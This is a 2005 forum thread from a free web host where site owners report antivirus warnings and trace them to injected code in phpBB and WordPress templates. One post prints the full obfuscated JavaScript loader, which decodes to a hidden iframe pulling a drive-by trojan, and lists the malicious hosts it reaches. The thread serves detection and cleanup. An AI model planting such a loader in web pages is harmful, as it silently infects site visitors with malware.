|
|
|
|
![]() ![]() |
Oct 4 2005, 03:04 PM
Post
#1
|
|
|
Advanced Member Group: Members Posts: 185 Joined: 14-June 05 From: The Netherlands Member No.: 6,228 |
Hi all, I think i have a problem, whenever i open a site on www.moody.astahost.com (my site) i get a virus waring from norton...is this my computer or my domain? If the domain, can I scan it somehow, so I can delete the virus? It's only when i open a site of that domain.....
Thx in advance, Moody |
|
|
|
Oct 4 2005, 03:47 PM
Post
#2
|
|
|
Premium Member Group: Members Posts: 230 Joined: 15-May 05 From: your sister Member No.: 5,102 |
When I go to your site, all I can see is the Index Directory page, and nothing else, NO virus warnings or anything like that. Perhaps your Norton doesn't like astahost.
GreetingZ |
|
|
|
Oct 4 2005, 05:36 PM
Post
#3
|
|
|
Demonic Enforcer Group: [HOSTED] Posts: 597 Joined: 2-March 05 From: Belgium Member No.: 2,861 |
Now I hate to admit it, but a friend when visiting my blog (hosted here) had the same issue. But then with trojans....
She also uses Norton... My blog http://blog.other-net.com Some more - Klass went to my site, which gives him an ActiveX error (though I at NO point used ActiveX in my site - only HTML - JavaScript and php) and that originated from an IP address other then my own sites IP (here's the WHOIS on the IP) What also worries me is - the 69.50.177.102/x379 seems to be a redirect to xawm.biz :cry:) The issue in my case seems to be a theme I updated last night, it held a small section of JavaScript code that forced my visitors in IE to download a trojan from a RUssian site. So I urge you to manually check code - in WordPress also the Themes for JavaScript code. |
|
|
|
Oct 4 2005, 06:24 PM
Post
#4
|
|
|
Pretty please? Group: Members Posts: 733 Joined: 28-November 04 From: Holland Member No.: 1,552 |
Guys (moody, moonwitch), you both seem to share the same problem.
Moody is using a phpBB forum, and moon has problems with her log, that runs on Wordpress.. However, you both (well.. only moody now, moon deleted her problem a while ago). Have a piece of javascript at the bottom of your site. CODE <script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#v furoolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body> When you decode it, you can see that it's actually a hidden frame which links to a attempts to open a site http://user19.iframe.ru/?s=1 Which, in return attempts to open these sites: http://69.50.177.102/x379/ind.php http://85.255.113.4/dl/adv400.php The first one is some kinda of counter, which can be ignored The second one attempts to load a certain applet, which I can't be bothered to checkout what it exactly does, probably something malicious :S To make a long story short. This is what could've happened. 1. Both of you suffered from an automated exploit batch which put the code there. 2. You guys got your site hacked, because someone was bored 3. I think this is it, astahost has gotten hacked :|. I come to this conclusion because both Moody and Moonwitch use a quite common piece of software (phpbb, wordpress), and they have the same problem at around the same time. And that there is some kind of script around here somewhere that changes stuff (cronjob maybe?). Anyway, everyone, if you use any kind of common software, forums/msg's boards/blogs etc. etc.. Please check your site for above code and remove it. And report it ofcourse. |
|
|
|
Oct 4 2005, 09:15 PM
Post
#5
|
|
|
Premium Member Group: Members Posts: 227 Joined: 25-April 05 Member No.: 4,369 |
I've got a phpBB forum on my website as well.. but never noticed any problems with antivirus e.t.c... hopefully it'll never happen
|
|
|
|
Oct 4 2005, 10:46 PM
Post
#6
|
|
|
Premium Member Group: Members Posts: 230 Joined: 15-May 05 From: your sister Member No.: 5,102 |
I once installed a test forum here on astahost, but FORTUNATELY I can't find any of the malicious source code in my pages. I hope that nobody here on astahost is being hacked.
|
|
|
|
Oct 5 2005, 05:54 AM
Post
#7
|
|
|
Advanced Member Group: Members Posts: 185 Joined: 14-June 05 From: The Netherlands Member No.: 6,228 |
Oke guys, i can say, my problem is also a trojan. Norton says that, but where is that code, i mean in wich file, or do i have to check all my files? Pls help, cus i think my visitors don't like this.
|
|
|
|
Oct 5 2005, 04:05 PM
Post
#8
|
|
|
Advanced Member Group: Members Posts: 185 Joined: 14-June 05 From: The Netherlands Member No.: 6,228 |
Oke guys, good news, i overwrited the templates subsilver folder and i dno't get the error from norton anymore, so i guess the trojan is away, but ofcourse i want to change my password now and it won't work i get this:
There was an error manipulating the password file. Can you help me? |
|
|
|
Oct 5 2005, 09:49 PM
Post
#9
|
|
|
Demonic Enforcer Group: [HOSTED] Posts: 597 Joined: 2-March 05 From: Belgium Member No.: 2,861 |
In my case - I had to check the source code of my blog. Apparently the code got added to every footer.php file in all my skins for WordPress. And I deleted the code last night - to return and find the code came back
Password changes, moody, is per request. http://www.astahost.com/free-web-hosting-p...reset-f101.html |
|
|
|
Oct 21 2006, 01:51 PM
Post
#10
|
|
|
Member [ Level 1 ] Group: Members Posts: 34 Joined: 19-October 06 Member No.: 16,667 |
I think Cpanel comes with an Antivirus! You can scan your system with that. I haven't been hosted yet but my earlier host had an antivirus after a virus outbreak affecting all my php files ! Some 'iframe problem stuff!!!
|
|
|
|
![]() ![]() ![]() |
Similar Topics
|
Lo-Fi Version | Time is now: 5th December 2008 - 12:25 PM |